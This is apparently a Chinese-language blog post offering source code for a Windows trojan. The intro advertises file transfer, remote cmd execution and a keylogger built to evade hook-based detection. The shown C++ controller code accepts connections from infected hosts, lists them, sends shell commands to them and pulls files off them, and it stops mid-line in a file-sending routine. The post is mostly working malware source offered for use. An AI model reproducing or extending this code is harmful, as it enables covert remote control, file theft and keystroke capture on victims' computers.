Trojan可以实现三个功能,分别为文件传输,远程执行cmd,键盘记录。其中键盘记录功能没有利用hook函数,有较强的隐蔽性。
现在给出源码:
client:
// client.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <winsock2.h>
#include <cstdio>
#include <wincrypt.h>
#include <cstring>
#include <iostream>
#include <string.h>
#include<vector>
#include<time.h>
#define PORT 2345
#define BUFFER_SIZE 1024
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "crypt32.lib")
using namespace std;
unsigned char mac_mine[6] = { 0x40, 0xe2, 0x30, 0x68, 0x43, 0xa9 }; //我的mac地址 40-E2-30-68-43-A9
unsigned char ip_mine[16] = {"127.0.0.1" }; //我的ip 172.20.10.5
int num;
struct node
{
sockaddr_in addrClient;
SOCKET socketClient;
}host[1024];
//检测是否有新的主机连接
DWORD WINAPI ClientThread(LPVOID lpParameter)
{
int len = sizeof(SOCKADDR);
SOCKET socketClient;
sockaddr_in addrClient;
int id = 0;
SOCKET socketSever = (SOCKET)lpParameter;
while (true)
{
socketClient = accept(socketSever, (SOCKADDR *)&addrClient, &len);
num++;
host[num].addrClient=addrClient;
host[num].socketClient = socketClient;
}
}
//将断开连接的主机删除
void RemoveHost(int id)
{
for (int i = id; i < num; i++)
{
host[i] = host[i + 1];
}
num--;
}
//检查是否有主机断开连接
void HostClear()
{
for (int i = num; i >=1; i--)
{
int sendbuf = 0;
int Result=send(host[i].socketClient, (char*)&sendbuf, sizeof(int), 0);
if (Result == SOCKET_ERROR)
{
RemoveHost(i);
}
}
}
//刷新
void refresh()
{
HostClear();
cout << "受控主机数:" << num << endl;
for (int i = 1; i <= num; i++)
{
cout << i << ". ip:" << inet_ntoa(host[i].addrClient.sin_addr) << " port:" << host[i].addrClient.sin_port << endl;
}
}
int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen)
{
int iResult;
int cnt = fixedlen; //剩余多少字节尚未接收
while (cnt > 0)
{
iResult = recv(s, recvbuf, cnt, 0);
if (iResult < 0)
{
printf("error: %d\n", WSAGetLastError());
return -1;
}
if (iResult == 0)//对方关闭连接,返回已接收到的小于fixedlen的字节数
return fixedlen - cnt;
recvbuf += iResult;
cnt -= iResult;
}
return fixedlen;
}
//远程执行cmd
void UseCmd(int id)
{
SOCKET s = host[id].socketClient;
char buf[BUFFER_SIZE];
char result[BUFFER_SIZE * 64];
int inputlen;
getchar();
while (1)
{
memset(buf, 0, sizeof(buf));
memset(result, 0, sizeof(result));
cout << "C:\\Socket\\Client>";
cin.getline(buf, sizeof(buf));
send(s, buf, BUFFER_SIZE, 0);
if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't')
{
cout << "The End." << endl;
return ;
}
recvn(s, result, sizeof(result));
printf(result);
}
}
void GetFile(int id)
{
SOCKET s = host[id].socketClient;
char filename[BUFFER_SIZE];
memset(filename, 0, sizeof(filename));
cout << "输入文件名:";
getchar();
cin.getline(filename, sizeof(filename));
send(s, filename, sizeof(filename), 0);
TCHAR name[BUFFER_SIZE];
memset(name, 0, sizeof(name));
for (int i = 0; filename[i]; i++)
{
name[i] = filename[i];
}
HANDLE hFile;
DWORD count;
hFile = CreateFile(
name, // 文件名
GENERIC_WRITE, // 写入权限
0, // 阻止其他进程访问
NULL, // 子进程不可继承本句柄
CREATE_ALWAYS, // 仅不存在时创建新文件
FILE_ATTRIBUTE_NORMAL, // 普通文件
NULL
);
unsigned int filelen;
recvn(s, (char *)&filelen, sizeof(unsigned int));
filelen = ntohl(filelen);
unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
char recvbuf[BUFFER_SIZE];
while (filelen > 0)
{
cout << filelen << endl;
memset(recvbuf, 0, sizeof(recvbuf));
unsigned int recvlen=recvn(s, recvbuf, recvbuflen);
WriteFile(hFile, recvbuf, recvlen, &count, 0);
filelen -= recvlen;
recvbuflen = min(filelen, recvbuflen);
}
CloseHandle(hFile);
cout << "文件接收成功!" << endl;
}
void SendFile(int id)
{
SOCKET s = host[id].socketClient;
char filename[BUFFER_SIZE];
memset(filename, 0, sizeof(filename));
cout << "输入文件名:";
getchar();
cin.getline(filename, sizeof(filename));
send(s, filename, BUFFER_SIZE, 0);
TCHAR name[BUFFER_SIZE];
memset(name, 0, sizeof(name));
for (int i = 0; filename[i]; i++)
{
name[i] = filename[i];
}
HANDLE hFile;
hFile = CreateFile(
name,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_A